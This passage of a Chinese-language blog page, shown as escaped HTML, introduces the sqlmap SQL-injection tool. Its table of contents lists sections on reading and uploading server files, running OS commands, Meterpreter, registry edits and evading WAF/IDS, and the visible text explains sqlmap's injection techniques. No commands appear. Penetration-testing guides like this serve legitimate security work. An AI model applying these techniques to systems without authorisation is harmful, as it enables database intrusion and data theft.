class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-65\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BB%8E%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%AD%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6\" title=\"\n\t\u4ece\u6570\u636e\u5e93\u670d\u52a1\u5668\u4e2d\u8bfb\u53d6\u6587\u4ef6 \n\">\n\t\u4ece\u6570\u636e\u5e93\u670d\u52a1\u5668\u4e2d\u8bfb\u53d6\u6587\u4ef6 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-66\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%8A%8A%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%B0%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%AD\" title=\"\n\t\u628a\u6587\u4ef6\u4e0a\u4f20\u5230\u6570\u636e\u5e93\u670d\u52a1\u5668\u4e2d \n\">\n\t\u628a\u6587\u4ef6\u4e0a\u4f20\u5230\u6570\u636e\u5e93\u670d\u52a1\u5668\u4e2d \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-67\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%BF%90%E8%A1%8C%E4%BB%BB%E6%84%8F%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4\" title=\"\n\t\u8fd0\u884c\u4efb\u610f\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4 \n\">\n\t\u8fd0\u884c\u4efb\u610f\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-68\" href=\"http:\/\/weizn.net\/?p=108\/#Meterpreter%E9%85%8D%E5%90%88%E4%BD%BF%E7%94%A8\" title=\"\n\tMeterpreter\u914d\u5408\u4f7f\u7528 \n\">\n\tMeterpreter\u914d\u5408\u4f7f\u7528 \n<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-69\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%AF%B9Windows%E6%B3%A8%E5%86%8C%E8%A1%A8%E6%93%8D%E4%BD%9C\" title=\"\n\t\u5bf9Windows\u6ce8\u518c\u8868\u64cd\u4f5c \n\">\n\t\u5bf9Windows\u6ce8\u518c\u8868\u64cd\u4f5c \n<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-70\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%AF%BB%E5%8F%96%E6%B3%A8%E5%86%8C%E8%A1%A8%E5%80%BC\" title=\"\n\t\u8bfb\u53d6\u6ce8\u518c\u8868\u503c \n\">\n\t\u8bfb\u53d6\u6ce8\u518c\u8868\u503c \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-71\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%86%99%E5%85%A5%E6%B3%A8%E5%86%8C%E8%A1%A8%E5%80%BC\" title=\"\n\t\u5199\u5165\u6ce8\u518c\u8868\u503c \n\">\n\t\u5199\u5165\u6ce8\u518c\u8868\u503c \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-72\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%A0%E9%99%A4%E6%B3%A8%E5%86%8C%E8%A1%A8%E5%80%BC\" title=\"\n\t\u5220\u9664\u6ce8\u518c\u8868\u503c \n\">\n\t\u5220\u9664\u6ce8\u518c\u8868\u503c \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-73\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%B3%A8%E5%86%8C%E8%A1%A8%E8%BE%85%E5%8A%A9%E9%80%89%E9%A1%B9\" title=\"\n\t\u6ce8\u518c\u8868\u8f85\u52a9\u9009\u9879 \n\">\n\t\u6ce8\u518c\u8868\u8f85\u52a9\u9009\u9879 \n<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-74\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%B8%B8%E8%A7%84%E5%8F%82%E6%95%B0\" title=\"\n\t\u5e38\u89c4\u53c2\u6570 \n\">\n\t\u5e38\u89c4\u53c2\u6570 \n<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-75\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BB%8Esqlite%E4%B8%AD%E8%AF%BB%E5%8F%96session\" title=\"\n\t\u4ecesqlite\u4e2d\u8bfb\u53d6session \n\">\n\t\u4ecesqlite\u4e2d\u8bfb\u53d6session \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-76\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BF%9D%E5%AD%98HTTPS%E6%97%A5%E5%BF%97\" title=\"\n\t\u4fdd\u5b58HTTP(S)\u65e5\u5fd7 \n\">\n\t\u4fdd\u5b58HTTP(S)\u65e5\u5fd7 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-77\" href=\"http:\/\/weizn.net\/?p=108\/#%E9%9D%9E%E4%BA%A4%E4%BA%92%E6%A8%A1%E5%BC%8F\" title=\"\n\t\u975e\u4ea4\u4e92\u6a21\u5f0f \n\">\n\t\u975e\u4ea4\u4e92\u6a21\u5f0f \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-78\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%BC%BA%E5%88%B6%E4%BD%BF%E7%94%A8%E5%AD%97%E7%AC%A6%E7%BC%96%E7%A0%81\" title=\"\n\t\u5f3a\u5236\u4f7f\u7528\u5b57\u7b26\u7f16\u7801 \n\">\n\t\u5f3a\u5236\u4f7f\u7528\u5b57\u7b26\u7f16\u7801 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-79\" href=\"http:\/\/weizn.net\/?p=108\/#%E7%88%AC%E8%A1%8C%E7%BD%91%E7%AB%99URL\" title=\"\n\t\u722c\u884c\u7f51\u7ad9URL \n\">\n\t\u722c\u884c\u7f51\u7ad9URL \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-80\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%A7%84%E5%AE%9A%E8%BE%93%E5%87%BA%E5%88%B0CSV%E4%B8%AD%E7%9A%84%E5%88%86%E9%9A%94%E7%AC%A6\" title=\"\n\t\u89c4\u5b9a\u8f93\u51fa\u5230CSV\u4e2d\u7684\u5206\u9694\u7b26 \n\">\n\t\u89c4\u5b9a\u8f93\u51fa\u5230CSV\u4e2d\u7684\u5206\u9694\u7b26 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-81\" href=\"http:\/\/weizn.net\/?p=108\/#DBMS%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81\" title=\"\n\tDBMS\u8eab\u4efd\u9a8c\u8bc1 \n\">\n\tDBMS\u8eab\u4efd\u9a8c\u8bc1 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-82\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%AE%9A%E4%B9%89dump%E6%95%B0%E6%8D%AE%E7%9A%84%E6%A0%BC%E5%BC%8F\" title=\"\n\t\u5b9a\u4e49dump\u6570\u636e\u7684\u683c\u5f0f \n\">\n\t\u5b9a\u4e49dump\u6570\u636e\u7684\u683c\u5f0f \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-83\" href=\"http:\/\/weizn.net\/?p=108\/#%E9%A2%84%E4%BC%B0%E5%AE%8C%E6%88%90%E6%97%B6%E9%97%B4\" title=\"\n\t\u9884\u4f30\u5b8c\u6210\u65f6\u95f4 \n\">\n\t\u9884\u4f30\u5b8c\u6210\u65f6\u95f4 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-84\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%B7%E6%96%B0session%E6%96%87%E4%BB%B6\" title=\"\n\t\u5237\u65b0session\u6587\u4ef6 \n\">\n\t\u5237\u65b0session\u6587\u4ef6 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-85\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%87%AA%E5%8A%A8%E8%8E%B7%E5%8F%96form%E8%A1%A8%E5%8D%95%E6%B5%8B%E8%AF%95\" title=\"\n\t\u81ea\u52a8\u83b7\u53d6form\u8868\u5355\u6d4b\u8bd5 \n\">\n\t\u81ea\u52a8\u83b7\u53d6form\u8868\u5355\u6d4b\u8bd5 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-86\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%BF%BD%E7%95%A5%E5%9C%A8%E4%BC%9A%E8%AF%9D%E6%96%87%E4%BB%B6%E4%B8%AD%E5%AD%98%E5%82%A8%E7%9A%84%E6%9F%A5%E8%AF%A2%E7%BB%93%E6%9E%9C\" title=\"\n\t\u5ffd\u7565\u5728\u4f1a\u8bdd\u6587\u4ef6\u4e2d\u5b58\u50a8\u7684\u67e5\u8be2\u7ed3\u679c \n\">\n\t\u5ffd\u7565\u5728\u4f1a\u8bdd\u6587\u4ef6\u4e2d\u5b58\u50a8\u7684\u67e5\u8be2\u7ed3\u679c \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-87\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BD%BF%E7%94%A8DBMS%E7%9A%84hex%E5%87%BD%E6%95%B0\" title=\"\n\t\u4f7f\u7528DBMS\u7684hex\u51fd\u6570 \n\">\n\t\u4f7f\u7528DBMS\u7684hex\u51fd\u6570 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-88\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%87%AA%E5%AE%9A%E4%B9%89%E8%BE%93%E5%87%BA%E7%9A%84%E8%B7%AF%E5%BE%84\" title=\"\n\t\u81ea\u5b9a\u4e49\u8f93\u51fa\u7684\u8def\u5f84 \n\">\n\t\u81ea\u5b9a\u4e49\u8f93\u51fa\u7684\u8def\u5f84 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-89\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BB%8E%E5%93%8D%E5%BA%94%E4%B8%AD%E8%8E%B7%E5%8F%96DBMS%E7%9A%84%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF\" title=\"\n\t\u4ece\u54cd\u5e94\u4e2d\u83b7\u53d6DBMS\u7684\u9519\u8bef\u4fe1\u606f \n\">\n\t\u4ece\u54cd\u5e94\u4e2d\u83b7\u53d6DBMS\u7684\u9519\u8bef\u4fe1\u606f \n<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-90\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%85%B6%E4%BB%96%E7%9A%84%E4%B8%80%E4%BA%9B%E5%8F%82%E6%95%B0\" title=\"\n\t\u5176\u4ed6\u7684\u4e00\u4e9b\u53c2\u6570 \n\">\n\t\u5176\u4ed6\u7684\u4e00\u4e9b\u53c2\u6570 \n<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-91\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BD%BF%E7%94%A8%E5%8F%82%E6%95%B0%E7%BC%A9%E5%86%99\" title=\"\n\t\u4f7f\u7528\u53c2\u6570\u7f29\u5199 \n\">\n\t\u4f7f\u7528\u53c2\u6570\u7f29\u5199 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-92\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%88%90%E5%8A%9FSQL%E6%B3%A8%E5%85%A5%E6%97%B6%E8%AD%A6%E5%91%8A\" title=\"\n\t\u6210\u529fSQL\u6ce8\u5165\u65f6\u8b66\u544a&nbsp; \n\">\n\t\u6210\u529fSQL\u6ce8\u5165\u65f6\u8b66\u544a&nbsp; \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-93\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%AE%BE%E5%AE%9A%E4%BC%9A%E5%8F%91%E7%9A%84%E7%AD%94%E6%A1%88\" title=\"\n\t\u8bbe\u5b9a\u4f1a\u53d1\u7684\u7b54\u6848 \n\">\n\t\u8bbe\u5b9a\u4f1a\u53d1\u7684\u7b54\u6848 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-94\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%8F%91%E7%8E%B0SQL%E6%B3%A8%E5%85%A5%E6%97%B6%E5%8F%91%E5%87%BA%E8%9C%82%E9%B8%A3%E5%A3%B0\" title=\"\n\t\u53d1\u73b0SQL\u6ce8\u5165\u65f6\u53d1\u51fa\u8702\u9e23\u58f0 \n\">\n\t\u53d1\u73b0SQL\u6ce8\u5165\u65f6\u53d1\u51fa\u8702\u9e23\u58f0 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-95\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%90%AF%E5%8F%91%E5%BC%8F%E6%A3%80%E6%B5%8BWAFIPSIDS%E4%BF%9D%E6%8A%A4\" title=\"\n\t\u542f\u53d1\u5f0f\u68c0\u6d4bWAF\/IPS\/IDS\u4fdd\u62a4 \n\">\n\t\u542f\u53d1\u5f0f\u68c0\u6d4bWAF\/IPS\/IDS\u4fdd\u62a4 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-96\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%B8%85%E7%90%86sqlmap%E7%9A%84UDFs%E5%92%8C%E8%A1%A8\" title=\"\n\t\u6e05\u7406sqlmap\u7684UDF(s)\u548c\u8868 \n\">\n\t\u6e05\u7406sqlmap\u7684UDF(s)\u548c\u8868 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-97\" href=\"http:\/\/weizn.net\/?p=108\/#%E7%A6%81%E7%94%A8%E5%BD%A9%E8%89%B2%E8%BE%93%E5%87%BA\" title=\"\n\t\u7981\u7528\u5f69\u8272\u8f93\u51fa \n\">\n\t\u7981\u7528\u5f69\u8272\u8f93\u51fa \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-98\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BD%BF%E7%94%A8%E6%8C%87%E5%AE%9A%E7%9A%84Google%E7%BB%93%E6%9E%9C%E9%A1%B5%E9%9D%A2\" title=\"\n\t\u4f7f\u7528\u6307\u5b9a\u7684Google\u7ed3\u679c\u9875\u9762 \n\">\n\t\u4f7f\u7528\u6307\u5b9a\u7684Google\u7ed3\u679c\u9875\u9762 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-99\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BD%BF%E7%94%A8HTTP%E5%8F%82%E6%95%B0%E6%B1%A1%E6%9F%93\" title=\"\n\t\u4f7f\u7528HTTP\u53c2\u6570\u6c61\u67d3 \n\">\n\t\u4f7f\u7528HTTP\u53c2\u6570\u6c61\u67d3 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-100\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%B5%8B%E8%AF%95WAFIPSIDS%E4%BF%9D%E6%8A%A4\" title=\"\n\t\u6d4b\u8bd5WAF\/IPS\/IDS\u4fdd\u62a4 \n\">\n\t\u6d4b\u8bd5WAF\/IPS\/IDS\u4fdd\u62a4 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-101\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%A8%A1%E4%BB%BF%E6%99%BA%E8%83%BD%E6%89%8B%E6%9C%BA\" title=\"\n\t\u6a21\u4eff\u667a\u80fd\u624b\u673a \n\">\n\t\u6a21\u4eff\u667a\u80fd\u624b\u673a \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-102\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%AE%89%E5%85%A8%E7%9A%84%E5%88%A0%E9%99%A4output%E7%9B%AE%E5%BD%95%E7%9A%84%E6%96%87%E4%BB%B6\" title=\"\n\t\u5b89\u5168\u7684\u5220\u9664output\u76ee\u5f55\u7684\u6587\u4ef6 \n\">\n\t\u5b89\u5168\u7684\u5220\u9664output\u76ee\u5f55\u7684\u6587\u4ef6 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-103\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%90%AF%E5%8F%91%E5%BC%8F%E5%88%A4%E6%96%AD%E6%B3%A8%E5%85%A5\" title=\"\n\t\u542f\u53d1\u5f0f\u5224\u65ad\u6ce8\u5165 \n\">\n\t\u542f\u53d1\u5f0f\u5224\u65ad\u6ce8\u5165 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-104\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%9D%E7%BA%A7%E7%94%A8%E6%88%B7%E5%90%91%E5%AF%BC%E5%8F%82%E6%95%B0\" title=\"\n\t\u521d\u7ea7\u7528\u6237\u5411\u5bfc\u53c2\u6570 \n\">\n\t\u521d\u7ea7\u7528\u6237\u5411\u5bfc\u53c2\u6570 \n<\/a><\/li><\/ul><\/li><\/ul><\/nav><\/div>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u7ed9<span>sqlmap<\/span><span>\u8fd9\u4e48\u4e00\u4e2a<\/span><span>url<\/span><span>\u7684\u65f6\u5019\uff0c\u5b83\u4f1a\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">1<span>\u3001\u5224\u65ad\u53ef\u6ce8\u5165\u7684\u53c2\u6570<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">2<span>\u3001\u5224\u65ad\u53ef\u4ee5\u7528\u90a3\u79cd<\/span><span>SQL<\/span><span>\u6ce8\u5165\u6280\u672f\u6765\u6ce8\u5165<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">3<span>\u3001\u8bc6\u522b\u51fa\u54ea\u79cd\u6570\u636e\u5e93<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">4<span>\u3001\u6839\u636e\u7528\u6237\u9009\u62e9\uff0c\u8bfb\u53d6\u54ea\u4e9b\u6570\u636e<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u652f\u6301\u4e94\u79cd\u4e0d\u540c\u7684\u6ce8\u5165\u6a21\u5f0f\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">1<span>\u3001\u57fa\u4e8e\u5e03\u5c14\u7684\u76f2\u6ce8\uff0c\u5373\u53ef\u4ee5\u6839\u636e\u8fd4\u56de\u9875\u9762\u5224\u65ad\u6761\u4ef6\u771f\u5047\u7684\u6ce8\u5165\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">2<span>\u3001\u57fa\u4e8e\u65f6\u95f4\u7684\u76f2\u6ce8\uff0c\u5373\u4e0d\u80fd\u6839\u636e\u9875\u9762\u8fd4\u56de\u5185\u5bb9\u5224\u65ad\u4efb\u4f55\u4fe1\u606f\uff0c\u7528\u6761\u4ef6\u8bed\u53e5\u67e5\u770b\u65f6\u95f4\u5ef6\u8fdf\u8bed\u53e5\u662f\u5426\u6267\u884c\uff08\u5373\u9875\u9762\u8fd4\u56de\u65f6\u95f4\u662f\u5426\u589e\u52a0\uff09\u6765\u5224\u65ad\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">3<span>\u3001\u57fa\u4e8e\u62a5\u9519\u6ce8\u5165\uff0c\u5373\u9875\u9762\u4f1a\u8fd4\u56de\u9519\u8bef\u4fe1\u606f\uff0c\u6216\u8005\u628a\u6ce8\u5165\u7684\u8bed\u53e5\u7684\u7ed3\u679c\u76f4\u63a5\u8fd4\u56de\u5728\u9875\u9762\u4e2d\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">4<span>\u3001\u8054\u5408\u67e5\u8be2\u6ce8\u5165\uff0c\u53ef\u4ee5\u4f7f\u7528<\/span><span>union<\/span><span>\u7684\u60c5\u51b5\u4e0b\u7684\u6ce8\u5165\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">5<span>\u3001\u5806\u67e5\u8be2\u6ce8\u5165\uff0c\u53ef\u4ee5\u540c\u65f6\u6267\u884c\u591a\u6761\u8bed\u53e5\u7684\u6267\u884c\u65f6\u7684\u6ce8\u5165\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u652f\u6301\u7684\u6570\u636e\u5e93\u6709\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">MySQL,&nbsp;Oracle,&nbsp;PostgreSQL,&nbsp;Microsoft&nbsp;SQL&nbsp;Server,&nbsp;Microsoft&nbsp;Access,&nbsp;IBM&nbsp;DB2,&nbsp;SQLite,&nbsp;Firebird,&nbsp;Sybase<span>\u548c<\/span><span>SAP&nbsp;MaxDB<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u63d0\u4f9b\u4e00\u4e2a\u7b80\u5355\u7684<span>URL<\/span><span>\uff0c<\/span><span>Burp<\/span><span>\u6216<\/span><span>WebScarab<\/span><span>\u8bf7\u6c42\u65e5\u5fd7\u6587\u4ef6\uff0c\u6587\u672c\u6587\u6863\u4e2d\u7684\u5b8c\u6574<\/span><span>http<\/span><span>\u8bf7\u6c42\u6216\u8005<\/span><span>Google<\/span><span>\u7684\u641c\u7d22\uff0c\u5339\u914d\u51fa\u7ed3\u679c\u9875\u9762\uff0c\u4e5f\u53ef\u4ee5\u81ea\u5df1\u5b9a\u4e49\u4e00\u4e2a\u6b63\u5219\u6765\u5224\u65ad\u90a3\u4e2a\u5730\u5740\u53bb\u6d4b\u8bd5\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6d4b\u8bd5<span>GET<\/span><span>\u53c2\u6570\uff0c<\/span><span>POST<\/span><span>\u53c2\u6570\uff0c<\/span><span>HTTP&nbsp;Cookie<\/span><span>\u53c2\u6570\uff0c<\/span><span>HTTP&nbsp;User-Agent<\/span><span>\u5934\u548c<\/span><span>HTTP&nbsp;Referer<\/span><span>\u5934\u6765\u786e\u8ba4\u662f\u5426\u6709<\/span><span>SQL<\/span><span>\u6ce8\u5165\uff0c\u5b83\u4e5f\u53ef\u4ee5\u6307\u5b9a\u7528\u9017\u53f7\u5206\u9694\u7684\u5217\u8868\u7684\u5177\u4f53\u53c2\u6570\u6765\u6d4b\u8bd5\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u8bbe\u5b9a<span>HTTP(S)<\/span><span>\u8bf7\u6c42\u7684\u5e76\u53d1\u6570\uff0c\u6765\u63d0\u9ad8\u76f2\u6ce8\u65f6\u7684\u6548\u7387\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">Youtube<span>\u4e0a\u6709\u4eba\u505a\u7684\u4f7f\u7528<\/span><span>sqlmap<\/span><span>\u7684\u89c6\u9891\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span><a href=\"http:\/\/www.youtube.com\/user\/inquisb\/videos\"><span class=\"15\" style=\"color:#0000FF;text-decoration:underline;font-family:'Times New Roman';\">http:\/\/www.youtube.com\/user\/inquisb\/videos<\/span><\/a><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span><a href=\"http:\/\/www.youtube.com\/user\/stamparm\/videos\"><span class=\"15\" style=\"color:#0000FF;text-decoration:underline;font-family:'Times New Roman';\">http:\/\/www.youtube.com\/user\/stamparm\/videos<\/span><\/a><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f7f\u7528<span>sqlmap<\/span><span>\u7684\u5b9e\u4f8b\u6587\u7ae0\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span><a href=\"http:\/\/unconciousmind.blogspot.com\/search\/label\/sqlmap\"><span class=\"15\" style=\"color:#0000FF;text-decoration:underline;font-family:'Times New Roman';\">http:\/\/unconciousmind.blogspot.com\/search\/label\/sqlmap<\/span><\/a><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u70b9\u51fb<\/span><span><a href=\"https:\/\/github.com\/sqlmapproject\/sqlmap\/tarball\/master\"><span class=\"15\" style=\"color:#0000FF;text-decoration:underline;font-family:'Times New Roman';\">https:\/\/github.com\/sqlmapproject\/sqlmap\/tarball\/master<\/span><\/a><\/span><span style=\"font-size:12.0000pt;font-family:'Times New 